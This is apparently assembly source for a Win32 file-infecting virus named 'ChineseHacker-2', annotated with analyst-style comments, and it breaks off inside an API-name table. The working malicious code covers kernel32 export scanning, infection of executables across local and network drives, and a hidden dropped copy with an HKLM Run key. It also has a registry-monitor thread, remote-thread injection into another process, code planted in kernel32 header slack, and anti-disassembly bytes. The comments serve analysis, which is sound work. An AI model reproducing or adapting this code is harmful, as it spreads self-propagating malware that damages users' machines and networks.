include wap32.inc

ApiAddressList struc
  ;Table of resolved API entry points plus a few virus-private slots.
  ;It is never a static variable: PushRunError carves it out of the stack
  ;(sub esp,size ApiAddressList+10h) and fills it with stosd in the order
  ;in which PushKnlApiStr / PushUser32ApiStr / ... leave the name strings
  ;on the stack, so the field order here MUST be the reverse of the push
  ;order in those string tables (first field = last string pushed).
  ;ESI points at this table for the rest of the code ([esi.KnlXxx]).
  ;Kernel32.DLL - 34 slots, one per string in PushKnlApiStr
  KnlLoadLibraryA          dd ?
  KnlCreateMutexA          dd ?
  KnlGetLastError          dd ?
  KnlGetCommandLineA       dd ?
  KnlWinExec               dd ?
  KnlGetDriveTypeA         dd ?
  KnlSetCurrentDirectoryA  dd ?
  KnlFindFirstFileA        dd ?
  KnlFindNextFileA         dd ?
  KnlFindClose		   dd ?
  KnlSetFileAttributesA    dd ?
  KnlSetFileTime           dd ?
  KnlLOpen                 dd ?
  KnlLRead                 dd ?
  KnlLWrite                dd ?
  KnlLSeek                 dd ?
  KnlLClose		   dd ?
  KnlSleep		   dd ?
  KnlRegisterServiceProc   dd ?	;RegisterServiceProcess: Win9x-only export, 0 on NT; ProcessProtect uses that as its OS check
  KnlGetCurrentProcessId   dd ?
  KnlOpenProcess	   dd ?
  KnlWriteProcessMemory	   dd ?
  KnlCreateRemoteThread	   dd ?
  KnlCreateKernelThread	   dd ?	;undocumented Win9x export; only called on the 9x path of ProcessProtect
  KnlCloseHandle	   dd ?
  KnlWaitForSingleObject   dd ?
  KnlVirtualAllocEx	   dd ?
  KnlGetSystemDirectoryA   dd ?
  KnlLCreat		   dd ?
  KnlCreateThread	   dd ?
  KnlTerminateThread	   dd ?
  KnlWideCharToMultiByte   dd ?
  KnlGetComputerNameA	   dd ?
  KnlGetSystemTime	   dd ?
  ;User32.DLL
  UserGetWinThreadProcId   dd ?
  UserFindWindowA	   dd ?
  UserMessageBoxA	   dd ?
  UserGetWindow		   dd ?
  UserSendMessageA	   dd ?
  UserwsprintfA		   dd ?
  ;AdvApi32.DLL
  AdvRegOpenKeyA	   dd ?
  AdvRegSetValueExA	   dd ?
  AdvRegQueryValueExA	   dd ?
  AdvRegNotifyChange	   dd ?
  ;Mpr.DLL
  MprWNetOpenEnumA	   dd ?
  MprWNetEnumResourceA     dd ?
  MprWNetCloseEnum         dd ?
  ;WSock32.DLL
  WsWSAStartup		   dd ?
  WsWSACleanup		   dd ?
  Wssend		   dd ?
  Wshtons		   dd ?
  Wsgethostbyname	   dd ?
  Wsconnect		   dd ?
  Wssocket		   dd ?
  Wsclosesocket		   dd ?
  Wsrecv		   dd ?
  ;VirusData - per-instance state, not API pointers
  DataKnlMzHeader	   dd ?	;kernel32 image base found by the MZ scan in FindKernel32
  DataVirusSize		   dd ?	;not referenced in this part of the file
  DataRemoteThread	   dd ?	;handle of the protector thread created by ProcessProtect (0 = none)


ApiAddressList ends

MAX_BUFF_SIZE=1000h				;4 KiB scratch size (not referenced in this part of the file)
VirusSize=offset VirusEnd-offset Start+10h	;byte length of the virus body, Start..VirusEnd (VirusEnd is defined later in the file), plus 10h slack

extrn MessageBoxA: proc
extrn ExitProcess: proc

.586p
.model flat,stdcall		;stdcall (callee pops its arguments) is what the inline-string / extended-call tricks below rely on

.data				;NOTE(review): the entire virus body that follows is assembled into the writable .data
				;segment, and it writes resolved API addresses into its own instructions at run time
				;(see GetVirusBaseInRegEdi), so wherever it ends up it must be mapped writable AND executable

;-----------------------------------------------------------------------
; Start - entry stub that runs in place of the host's entry point.
; Saves all registers, calls VirusEnd (defined later in the file; the
; NeedDecode label suggests a decode step - TODO confirm), then hands
; control to PushRunError with ESI = the return address the loader left
; on the stack when it called the entry point.  PushRunError never
; returns normally: the popad below is the resume address of the SEH
; frame it installs, and is reached by a deliberate int 3 whenever the
; virus wants the original program to run instead.
;-----------------------------------------------------------------------
Start:
	pushad
	call	VirusEnd
NeedDecode:
	mov	esi,[esp+4*8]		;8 dwords above pushad's save area = the address we were called from (original: kernel PE-loader code, imprecise)
	call	PushRunError		;pushes the address of the popad below = where to continue after an exception
	popad
	PushXXXCode db 68h		;68h = PUSH imm32 opcode: with the dword below and the ret this is "jmp OldEntryRVA" (JmpOldApp)
	OldEntryRVA dd offset Exit	;defaults to Exit (defined later); presumably rewritten to the host's entry when a file is infected (FixPeFile not in view)
	ret
	db	0e9h			;stray JMP rel32 opcode so a linear-sweep disassembler eats the next 4 bytes (anti-disassembly)

;-----------------------------------------------------------------------
; PushRunError - install the "run the original program" exception frame,
; locate kernel32 by walking back from an address inside it, resolve
; every API the virus uses into a stack-resident ApiAddressList, then
; check the infection-marker mutex.
; In:   [esp] = resume address (the popad in Start), popped into ecx
;       esi   = an address inside kernel32 (the loader's return address)
; Out:  esi = esp = pointer to ApiAddressList, fixed for the rest of the run
; Falls through to ExecOldProgram if this is the first instance; ends in
; int 3 (-> resume in Start -> jump to the host entry) if not.
; Clobbers everything; the pushad in Start preserves host state.
;-----------------------------------------------------------------------
PushRunError:
	pop	ecx			;ecx = resume address pushed by "call PushRunError"
	call	SetSehFrame		;defined elsewhere; presumably installs an SEH frame that resumes at ecx - TODO confirm
FindKernel32:		
	and	esi,0fffff000h		;page-align the in-kernel32 address (original: kernel PE-loader location, imprecise)
LoopFindKernel32:
	sub	esi,1000h 		;walk backwards one page at a time ...
	cmp	word ptr[esi],'ZM'	;... until the bytes "MZ" are found: taken as kernel32's image base.  No lower bound - an unmapped page would fault into the frame just installed
	jnz	short LoopFindKernel32
GetPeHeader:
	movzx	edi,word ptr[esi.PEHeaderOffset]	;e_lfanew (these struct field names come from wap32.inc)
	add	edi,esi			;edi = PE header
	mov	ebp,[edi.fhExportsRVA]
	add	ebp,esi			;ebp = export directory
	mov	ebx,[ebp.etExportNameList]
	add	ebx,esi			;ebx = AddressOfNames
	xor	eax,eax			;eax = name index, later used to index AddressOfNameOrdinals
	mov	edx,esi			;edx = kernel32 base (esi is clobbered by cmpsb below)
LoopFindApiStr:
	add	ebx,04			;advanced before the first read, so name entry 0 is never compared
	inc	eax
	mov	edi,[ebx]
	add	edi,edx			;edi = this export's name string
	call	PushStrGetProcAddress	;pushes the address of the string below as its "return address"
	db	'GetProcAddress',0
PushStrGetProcAddress:
	pop	esi			;esi = "GetProcAddress"
	xor	ecx,ecx
	mov	cl,15			;14 chars + NUL: an exact match, not a prefix match
	cld
	rep	cmpsb  
	jnz	short LoopFindApiStr  
	mov	esi,edx 
	mov	ebx,[ebp.etExportOrdlList]
	add	ebx,esi			;AddressOfNameOrdinals
	movzx	ecx,word ptr[ebx+eax*2]	;ordinal of the matched name
	mov	ebx,[ebp.etExportAddrList]
	add	ebx,esi			;AddressOfFunctions
	mov	ebx,[ebx+ecx*4]
	add	ebx,esi			;ebx = GetProcAddress; stays in ebx through all the resolve loops below

	sub	esp,size ApiAddressList+10h	;carve the API table out of the stack (never released; later SEH frames reset esp)
	mov	edi,esp			;edi = next table slot to fill (stosd)
	
	mov	[esp.DataKnlMzHeader],esi

	call	PushKnlApiStr		;leaves 34 name pointers on the stack, "LoadLibraryA" on top, ecx = 34
LoopRelocKnlApi:
	mov	ebp,ecx			;GetProcAddress clobbers ecx
	call	ebx,esi			;GetProcAddress(esi, <name pointer already on the stack>): only hModule is pushed here;
					;the callee's stdcall "ret 8" also pops the name pointer, which is how the list is consumed
	cld
	stosd  				;store the address into the next ApiAddressList slot
	mov	ecx,ebp
	loop	LoopRelocKnlApi

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushUser32Str		;same trick: the DLL name's address becomes LoadLibraryA's argument
	db	'USER32.DLL',0
PushUser32Str:
	call	eax			;LoadLibraryA("USER32.DLL")
	mov	esi,eax			;esi = module handle for GetProcAddress
	call	PushUser32ApiStr	;pushes the User32 names, ecx = count
LoopRelocUser32Api:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp			;resolve User32.dll APIs
	loop	LoopRelocUser32Api
	
	mov	eax,[esp.KnlLoadLibraryA]
	call	PushAdvApi32Str
	db	'ADVAPI32.DLL',0
PushAdvApi32Str:
	call	eax			;LoadLibraryA("ADVAPI32.DLL")
	mov	esi,eax
	call	PushAdvApiStr
LoopRelocAdvApi32Api:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp			;resolve ADVAPI32.dll APIs
	loop	LoopRelocAdvApi32Api

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushMprStr
	db	'MPR.DLL',0
PushMprStr:
	call	eax			;LoadLibraryA("MPR.DLL")
	mov	esi,eax
	call	PushMprApiStr
LoopRelocMprApi:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp			;resolve MPR.dll APIs
	loop	LoopRelocMprApi

	mov	eax,[esp.KnlLoadLibraryA]
	call	PushWsStr
	db	'WSOCK32.DLL',0
PushWsStr:
	call	eax			;LoadLibraryA("WSOCK32.DLL")
	mov	esi,eax
	call	PushWsApiStr
LoopRelocWsApi:
	mov	ebp,ecx
	call	ebx,esi
	cld
	stosd  
	mov	ecx,ebp			;resolve WSOCK32.dll APIs (the original comment said MPR here - copy/paste slip)
	loop	LoopRelocWsApi

	mov	esi,esp			;esi = API table pointer; never changed from here on

	call	PushMutexName
	db	'ChineseHacker-2',0	;infection-marker mutex name (IOC)
PushMutexName:  
	call	[esi.KnlCreateMutexA],0,0	;CreateMutexA(NULL, FALSE, "ChineseHacker-2") - name pointer comes from the call above
	call	[esi.KnlGetLastError]
	or	eax,eax			;0 -> the mutex is new, this is the first running instance
	jz	short ExecOldProgram
	int	3;			;already running: raise an exception so the frame from SetSehFrame resumes in Start and runs the host program
	db	0e9h			;anti-disassembly byte

;-----------------------------------------------------------------------
; ExecOldProgram - main loop of the first instance.
; Re-runs the host's own command line as a separate process (that second
; instance hits the mutex check and jumps to the original program), then
; installs persistence/protection once and rescans forever.
; esi = API table.  Each PushXxxErrorProc call installs an SEH frame whose
; resume address is the instruction after the call, so the "mov esi,esp"
; lines re-derive the table pointer after the deliberate exceptions.
;-----------------------------------------------------------------------
ExecOldProgram:
	call	[esi.KnlGetCommandLineA]
	call	[esi.KnlWinExec],eax,L 01	;WinExec(GetCommandLineA(), 1): launch the original program (L is a macro from wap32.inc, not shown)

	call	PushNextRunErrorProc	;drop a copy, set the Run key, start the registry-monitor and protector threads; comes back via int 3
	mov	esi,esp			;relies on the SEH handler restoring esp to this frame - TODO confirm in SetSehFrame
StartScan:	
	call	PushScanErrorProc	;enumerate local + network files (infect pass, then "mail" pass); comes back via int 3
	mov	esi,esp
	call	[esi.KnlSleep],1000*60;*10	;Sleep(60000) = one minute: the "*10" (ten minutes, as the original comment claims) is commented out
	jmp	short StartScan
	db	0e9h			;anti-disassembly byte
;-----------------------------------------------------------------------
; PushScanErrorProc - one scan round, run under its own SEH frame.
; GetFoundFileCallBackAddr / GetFoundDirCallBackAddr (defined elsewhere)
; return in edx the address of a callback slot; this routine points the
; slots at the handlers for each pass and enumerates local drives and
; network resources twice: once with OptExeFile (original: infect files)
; and once with OptMailFile (original: send mail).  It then babysits the
; protector thread.  Leaving the routine is always by exception.
; In:  [esp] = resume address, popped into ecx.  esi = API table.
;-----------------------------------------------------------------------
PushScanErrorProc:
	pop	ecx			;resume address = the "mov esi,esp" after the call in StartScan
	call	SetSehFrame

ScanExeFile:
	call	GetFoundFileCallBackAddr	;edx = address of the file-callback slot
	lea	eax,[edx+offset OptExeFile-offset FoundFileCallBackAddr]	;run-time address of OptExeFile, computed relative to the slot
	mov	[edx],eax		;file callback = OptExeFile (infect)

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
	mov	[edx],eax		;directory callback = OptLocalDir

	call	EnumLogDrive		;walk local drives (original: search local files and infect)

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
	mov	[edx],eax		;directory callback = OptNetDir

	call	EnumNetResource		;walk network resources (original: search remote files and infect)

ScanMailFile:
	call	GetFoundFileCallBackAddr
	lea	eax,[edx+offset OptMailFile-offset FoundFileCallBackAddr]
	mov	[edx],eax		;file callback = OptMailFile (original: send mail)

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
	mov	[edx],eax		;directory callback = OptLocalDir
	call	EnumLogDrive		;local pass with the mail handler

	call	GetFoundDirCallBackAddr
	lea	eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
	mov	[edx],eax		;directory callback = OptNetDir

	call	EnumNetResource		;network pass with the mail handler

CheckRemoteAndWait:
	mov	eax,[esi.DataRemoteThread]	;protector thread handle from ProcessProtect (0 if none was created)
	call	[esi.KnlWaitForSingleObject],eax,1000*60;	;wait up to one minute (the original "8 hours" comment is stale)
	cmp	eax,-1			;only WAIT_FAILED (-1, e.g. a 0 handle) counts as "protector gone";
	jnz	short AddWordToQQMsg	;WAIT_OBJECT_0 (thread ended) and WAIT_TIMEOUT both go on to the QQ thread
NeedCreateRemote:
	push	esi			;esi is saved around the exception round-trip
	call	PushWaitErrorProc	;re-run ProcessProtect under a fresh SEH frame; returns here through its int 3
	pop	esi
	call	GetNetSendMsg
	db	'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0	;Messenger-service broadcast (IOC)
GetNetSendMsg:
	pop	eax			;eax = the command line above
	call	[esi.KnlWinExec],eax,0	;WinExec(cmd, SW_HIDE)
	jmp	short CheckRemoteAndWait
PushWaitErrorProc:
	pop	ecx			;resume address = the "pop esi" after the call above
	call	SetSehFrame

	call	ProcessProtect		;re-create the protector thread; ProcessProtect ends with int 3 and never returns here
	db	0e9h			;anti-disassembly byte

;-----------------------------------------------------------------------
; AddWordToQQMsg - start the SendQQMsg thread, then keep watching the
; protector thread.  Reached from CheckRemoteAndWait when the wait on the
; protector thread did not fail.
; The resolved FindWindowA/GetWindow/SendMessageA/Sleep addresses are
; written straight into SendQQMsg's code (slots FindWindowA9x2k etc.,
; defined with SendQQMsg elsewhere) - self-modifying code, hence the
; position-independent edi+offset arithmetic.  Original comment: thread
; that appends a message to QQ (instant messenger) windows.
; esi = API table; ebx = SendQQMsg thread handle (never closed).
;-----------------------------------------------------------------------
AddWordToQQMsg:	
	call	GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
	pop	edi			;edi = run-time address of this label; every "offset X-offset GetVirusBaseInRegEdi" is relative to it

	mov	eax,[esi.UserFindWindowA]	;patch the imports the thread uses into its code
	mov	[edi+offset FindWindowA9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.UserGetWindow]
	mov	[edi+offset GetWindow9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.UserSendMessageA]
	mov	[edi+offset SendMessageA9x2k-offset GetVirusBaseInRegEdi],eax
	mov	eax,[esi.KnlSleep]
	mov	[edi+offset Sleep9x2k-offset GetVirusBaseInRegEdi],eax

	lea	eax,[edi+offset SendQQMsg-offset GetVirusBaseInRegEdi]
	push	eax			;slot for lpThreadId (value unused)
	call	[esi.KnlCreateThread],0,0,eax,eax,0,esp	;CreateThread(NULL,0,SendQQMsg,SendQQMsg,0,&tid)
	mov	ebx,eax			;ebx = thread handle (original: keep SendQQMsg alive ~10 minutes)
	pop	eax

CheckRemoteAndWaitAgain:
	mov	eax,[esi.DataRemoteThread]
	call	[esi.KnlWaitForSingleObject],eax,1000*60;	;one minute (original comment says ten)
	push	eax			;keep the wait result across TerminateThread
	call	[esi.KnlTerminateThread],ebx,0	;kill SendQQMsg after the wait; repeated on every loop iteration, handle never closed
	pop	eax
	cmp	eax,-1
	jz	short NeedCreateRemoteAgain	;WAIT_FAILED -> protector handle is bad, re-create it
	int	3;			;otherwise raise an exception - original: continue searching files, i.e. resume in StartScan (presumably via the PushScanErrorProc frame)
	db	0e9h			;anti-disassembly byte
NeedCreateRemoteAgain:
	push	esi
	call	PushWaitErrorProcAgain	;ProcessProtect under a fresh frame; returns here through its int 3
	pop	esi
	jmp	short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
	pop	ecx			;resume address = the "pop esi" above
	call	SetSehFrame

	call	ProcessProtect		;ends in int 3, never returns here
	db	0e9h			;anti-disassembly byte

;-----------------------------------------------------------------------
; PushNextRunErrorProc / RegisterProtect - persistence.
; 1. Drops a copy of the virus at the path built by BuildVirusPathInStack
;    (defined elsewhere), marks it read-only+hidden+system and keeps the
;    file handle open (original: so the file cannot be deleted).
; 2. Writes that path to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
;    as value "Runonce" (REG_SZ) and starts RegisterProtectProc (defined
;    elsewhere) as a thread with the still-open key (original: registry
;    monitor thread).
; 3. Falls through into ProcessProtect, which ends in int 3.
; In:  [esp] = resume address (in ExecOldProgram), popped into ecx.
;      esi = API table.
; IOCs: Run value "Runonce", dropped file with attributes 7.
;-----------------------------------------------------------------------
PushNextRunErrorProc:
	pop	ecx			;resume address = the "mov esi,esp" after the call in ExecOldProgram
	call	SetSehFrame

RegisterProtect:
	sub	esp,100h		;100h-byte buffer for the drop path
	call	BuildVirusPathInStack,esp	;defined elsewhere; fills the buffer
	mov	edi,esp			;edi = path
	
	call	[esi.KnlLCreat],edi,10h	;_lcreat(path, 10h) (original: exclusive create)
	cmp	eax,-1h			;HFILE_ERROR -> could not create (e.g. already there): skip the drop, still (re)set the Run key
	jz	short OptRegister
	mov	ebx,eax			;ebx = dropped file handle
	call	UnzipVirusToFile	;defined elsewhere (original: decompress the PE file into it)
	call	[esi.KnlLSeek],ebx,0,0	;rewind to offset 0
	call	FixPeFile,ebx		;defined elsewhere (original: infect the PE file); the handle is deliberately never closed
	mov	edi,esp
	call	[esi.KnlSetFileAttributesA],edi,7h	;7 = READONLY|HIDDEN|SYSTEM
	
OptRegister:	
	push	eax			;slot that RegOpenKeyA fills with the key handle (phkResult)
	push	esp
	call	PushRegKeyStr		;pushes the subkey string's address as lpSubKey
	db	'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
PushRegKeyStr:
	call	[esi.AdvRegOpenKeyA],080000002h	;RegOpenKeyA(HKEY_LOCAL_MACHINE, subkey, &slot); return value not checked
	pop	ebx			;ebx = hKey
	mov	eax,esp			;eax = the path buffer (esp is back at the 100h buffer)
	call	PushKeyNameStr
	db	'Runonce',0		;value name under ...\Run (IOC)
PushKeyNameStr:
	pop	ecx			;ecx = "Runonce"
	call	[esi.AdvRegSetValueExA],ebx,ecx,0,1,eax,100h	;RegSetValueExA(hKey,"Runonce",0,REG_SZ,path,100h): writes the whole buffer, not strlen+1

	call	GetVirusBaseInEdi	
GetVirusBaseInEdi:
	pop	edi			;edi = run-time address of this label, base for the offset arithmetic below

	mov	eax,[esi.AdvRegQueryValueExA]	;patch the imports RegisterProtectProc uses into its code (self-modifying)
	mov	[edi+offset AdvRegQueryValueExA9x2k-offset GetVirusBaseInEdi],eax
	mov	eax,[esi.AdvRegSetValueExA]
	mov	[edi+offset AdvRegSetValueExA9x2k-offset GetVirusBaseInEdi],eax
	mov	eax,[esi.AdvRegNotifyChange]
	mov	[edi+offset AdvRegNotifyChangeKeyValue9x2k-offset GetVirusBaseInEdi],eax

	lea	eax,[edi+offset RegisterProtectProc-offset GetVirusBaseInEdi]		
	push	eax			;slot for lpThreadId
	call	[esi.KnlCreateThread],0,0,eax,ebx,0,esp	;CreateThread(NULL,0,RegisterProtectProc,hKey,0,&tid)
	pop	eax			;hKey is intentionally not closed: the monitor thread keeps using it; falls through to ProcessProtect

;-----------------------------------------------------------------------
; ProcessProtect - start the "protector" thread outside this process.
; Copies ProcessProtectProc (code defined elsewhere, ProcessProtectProcSize
; bytes) followed by a 100h-byte buffer holding the virus path into a
; foreign address space and runs it with this process's PID as parameter.
; OpenProcess/WaitForSingleObject/WinExec are patched into the copied
; code, so presumably the thread waits on this process and re-launches
; the dropped file when it exits - TODO confirm in ProcessProtectProc.
; OS detection: RegisterServiceProcess is only exported by the Win9x
; kernel32, so a zero slot means NT -> Process2kProtect.
; Win9x path (here): RegisterServiceProcess(0,1) hides the process, then
; the code is copied into the unused space between kernel32's headers and
; its first section and started with the undocumented CreateKernelThread.
; Out: [esi.DataRemoteThread] = thread handle, or 0 on any failure.
; Always ends in int 3 (exception -> the caller's SEH resume address).
;-----------------------------------------------------------------------
ProcessProtect:
	xor	eax,eax
	mov	[esi.DataRemoteThread],eax	;cleared first; stays 0 if no thread is created

	sub	esp,100h		;path buffer, shipped along with the thread code
	call	BuildVirusPathInStack,esp

	call	GetVirusBaseInEdiAgain
GetVirusBaseInEdiAgain:
	pop	edi			;edi = run-time address of this label (also used by Process2kProtect)

	mov	eax,[esi.KnlOpenProcess]	;patch imports into ProcessProtectProc's code (self-modifying)
	mov	[edi+offset KnlOpenProcess9x2k-offset GetVirusBaseInEdiAgain],eax
	mov	eax,[esi.KnlWaitForSingleObject]
	mov	[edi+offset KnlWaitForSingleObject9x2k-offset GetVirusBaseInEdiAgain],eax
	mov	eax,[esi.KnlWinExec]
	mov	[edi+offset KnlWinExec9x2k-offset GetVirusBaseInEdiAgain],eax	

	mov	eax,[esi.KnlRegisterServiceProc]
	or	eax,eax			;0 = RegisterServiceProcess not exported = NT family
	jz	short Process2kProtect	

Process9xProtect:
	call	eax,L 0,L 1		;RegisterServiceProcess(0,1): hide this process from the task list (original: first-level protection)

	mov	edx,[esi.DataKnlMzHeader]	;kernel32 base found in FindKernel32
	movzx	ebx,word ptr[edx.PEHeaderOffset]
	add	ebx,edx			;ebx = kernel32 PE header
	mov	ecx,[ebx.fhObjectTable00.otRVA]	;RVA of the first section
	mov	ebp,[ebx.fhHeaderSize]	;SizeOfHeaders
	sub	ecx,ebp			;ecx = unused bytes between the headers and the first section
	cmp	ecx,200h
	jb	short Process9xProtectEnd	;not enough room: give up, handle stays 0 (assumes ProcessProtectProcSize+100h <= 200h, not checked)
	add	ebp,edx			;ebp = start of that slack inside the kernel32 image

	lea	edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]	
	call	MoveDataToKnl,edx,ebp,ProcessProtectProcSize	;defined elsewhere: copy the thread code into kernel32's header slack
	lea	ecx,[ebp+ProcessProtectProcSize]
	mov	edx,esp			;the path buffer ...
	call	MoveDataToKnl,edx,ecx,100h	;... goes right after the code

	call	[esi.KnlGetCurrentProcessId]
	push	eax			;slot for lpThreadId
	call	[esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp	;undocumented Win9x API: run the copied code with our PID as parameter
	mov	[esi.DataRemoteThread],eax
	pop	eax
	
	call	[esi.KnlSleep],500

Process9xProtectEnd:
	int	3			;deliberate exception: control goes to the current SEH frame's resume address
	db	0e9h			;anti-disassembly byte

;-----------------------------------------------------------------------
; Process2kProtect - NT-family branch of ProcessProtect: remote-thread
; injection into another process.
; Target = the process owning the window returned by FindWindowA(NULL,NULL)
; (original: Explorer or the top window).  Allocates 200h bytes of
; PAGE_EXECUTE_READWRITE there, writes ProcessProtectProc and then the
; 100h-byte path buffer, and starts it with CreateRemoteThread, parameter
; = this process's PID.  Assumes ProcessProtectProcSize+100h <= 200h
; (not checked).
; In:  edi = address of GetVirusBaseInEdiAgain (set in ProcessProtect),
;      esp = the path buffer, esi = API table.
; Out: [esi.DataRemoteThread] = remote thread handle, 0 on failure.
; The process handle is closed; the thread handle is kept.  Ends in int 3.
;-----------------------------------------------------------------------
Process2kProtect:		;(original comment: fill in API addresses)
	call	[esi.UserFindWindowA],0,0	;FindWindowA(NULL,NULL)
	push	eax			;slot that receives the PID
	call	[esi.UserGetWinThreadProcId],eax,esp	;GetWindowThreadProcessId(hwnd,&pid)
	call	[esi.KnlOpenProcess],PROCESS_ALL_ACCESS,0	;OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid): the pid slot pushed above is the 3rd argument
	or	eax,eax
	jz	short Process2kProtectEnd	;could not open the target: handle stays 0
	mov	ebx,eax			;ebx = hProcess
	call	[esi.KnlVirtualAllocEx],ebx,NULL,200h,MEM_COMMIT,L 40h	;40h = PAGE_EXECUTE_READWRITE
	or	eax,eax
	jz	short Close2kHandle
	mov	ebp,eax			;ebp = remote buffer

	lea	edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
	push	eax			;slot for lpNumberOfBytesWritten
	call	[esi.KnlWriteProcessMemory],ebx,ebp,edx,ProcessProtectProcSize,esp
	pop	eax			;eax = bytes written
	cmp	eax,ProcessProtectProcSize
	jnz	short Close2kHandle	;short write: give up (the remote allocation is not freed)
		
	mov	edx,esp			;the path buffer from ProcessProtect
	lea	ecx,[ebp+ProcessProtectProcSize]
	push	eax			;bytes-written slot, reused below as lpThreadId
	call	[esi.KnlWriteProcessMemory],ebx,ecx,edx,100h,esp	;result not checked
	call	[esi.KnlGetCurrentProcessId]
	call    [esi.KnlCreateRemoteThread],ebx,NULL,NULL,ebp,eax,NULL,esp	;CreateRemoteThread(hProc,NULL,0,copied code,our PID,0,&tid)
	mov	[esi.DataRemoteThread],eax
	pop	eax

Close2kHandle:
	call	[esi.KnlCloseHandle],ebx	;only the process handle is closed
	call	[esi.KnlSleep],500

Process2kProtectEnd:
	int	3			;deliberate exception, same as the 9x path
	db	0e9h			;anti-disassembly byte
	
;-----------------------------------------------------------------------
; PushKnlApiStr - push the kernel32 import names onto the stack.
; Each "call PushKnlApiStrNN" pushes, as its return address, the address
; of the NUL-terminated string that immediately follows it; the chain is
; never returned from, so on exit the stack holds 34 string pointers with
; "LoadLibraryA" on top and "GetSystemTime" at the bottom - exactly the
; field order of ApiAddressList (keep the two in sync: one is the reverse
; of the other).
; Out: ecx = number of strings (34).  Exits with "jmp eax" to the real
;      return address so the pointers stay on the stack; LoopRelocKnlApi
;      then consumes one per GetProcAddress call through its stdcall pops.
; Note: RegisterServiceProcess and CreateKernelThread are Win9x-only
; exports; on NT GetProcAddress yields 0 for them, which ProcessProtect
; uses as its OS check.
;-----------------------------------------------------------------------
PushKnlApiStr:	;Out: ecx = number of names
	pop	eax			;eax = the real return address
	mov	ecx,esp			;remember esp before the pushes
	call	PushKnlApiStr33
	db	'GetSystemTime',0
PushKnlApiStr33:
	call	PushKnlApiStr32
	db	'GetComputerNameA',0
PushKnlApiStr32:
	call	PushKnlApiStr31
	db	'WideCharToMultiByte',0
PushKnlApiStr31:
	call	PushKnlApiStr30
	db	'TerminateThread',0
PushKnlApiStr30:
	call	PushKnlApiStr29
	db	'CreateThread',0
PushKnlApiStr29:
	call	PushKnlApiStr28
	db	'_lcreat',0
PushKnlApiStr28:
	call	PushKnlApiStr27
	db	'GetSystemDirectoryA',0
PushKnlApiStr27:
	call	PushKnlApiStr26
	db	'VirtualAllocEx',0
PushKnlApiStr26:
	call	PushKnlApiStr25
	db	'WaitForSingleObject',0
PushKnlApiStr25:
	call	PushKnlApiStr24
	db	'CloseHandle',0
PushKnlApiStr24:
	call	PushKnlApiStr23
	db	'CreateKernelThread',0		;undocumented, Win9x only
PushKnlApiStr23:
	call	PushKnlApiStr22
	db	'CreateRemoteThread',0
PushKnlApiStr22:
	call	PushKnlApiStr21
	db	'WriteProcessMemory',0
PushKnlApiStr21:

	call	PushKnlApiStr20
	db	'OpenProcess',0
PushKnlApiStr20:
	call	PushKnlApiStr19
	db	'GetCurrentProcessId',0
PushKnlApiStr19:
	call	PushKnlApiStr18
	db	'RegisterServiceProcess',0	;Win9x only; its absence is the NT check
PushKnlApiStr18:    
	call	PushKnlApiStr17
	db	'Sleep',0
PushKnlApiStr17:    
	call	PushKnlApiStr16
	db	'_lclose',0
PushKnlApiStr16:  
	call	PushKnlApiStr15
	db	'_llseek',0
PushKnlApiStr15:  
	call	PushKnlApiStr14
	db	'_lwrite',0
PushKnlApiStr14:  
	call	PushKnlApiStr13
	db	'_lread',0
PushKnlApiStr13:  
	call	PushKnlApiStr12
	db	'_lopen',0
PushKnlApiStr12:
	call	PushKnlApiStr11
	db	'SetFileTime',0
PushKnlApiStr11:
	call  PushKnlApiStr10
	db	'SetFileAttributesA',0
PushKnlApiStr10:
	call	PushKnlApiStr09
	db	'FindClose',0
PushKnlApiStr09:
	call	PushKnlApiStr08
	db	'FindNextFileA',0
PushKnlApiStr08:
	call	PushKnlApiStr07
	db	'FindFirstFileA',0
PushKnlApiStr07:
	call	PushKnlApiStr06
	db	'SetCurrentDirectoryA',0
PushKnlApiStr06:
	call	PushKnlApiStr05
	db	'GetDriveTypeA',0
PushKnlApiStr05:
	call	PushKnlApiStr04
	db	'WinExec',0
PushKnlApiStr04:
	call	PushKnlApiStr03
	db	'GetCommandLineA',0
PushKnlApiStr03:
	call	PushKnlApiStr02
	db	'GetLastError',0
PushKnlApiStr02:
	call	PushKnlApiStr01
	db	'CreateMutexA',0
PushKnlApiStr01:
	call	PushKnlApiStr00
	db	'LoadLibraryA',0		;last pushed = top of stack = first ApiAddressList field
PushKnlApiStr00:
	sub	ecx,esp
	shr	ecx,2			;ecx = bytes pushed / 4 = number of strings
	jmp	eax			;return without popping the pointers
	db	0e9h			;anti-disassembly byte

PushUser32ApiStr:
	pop	eax
	mov	ecx,esp
	call	PushUser32ApiStr05
	db	'wsprintfA',0
PushUser32ApiStr05:   
	call	PushUser32ApiStr04
	db	'SendMessageA',0
PushUser32ApiStr04:   
	call	PushUser32ApiStr03
	db	'GetWindow',0
PushUser32ApiStr03:   
	call	PushUser32ApiStr02
	db	'MessageBoxA',0
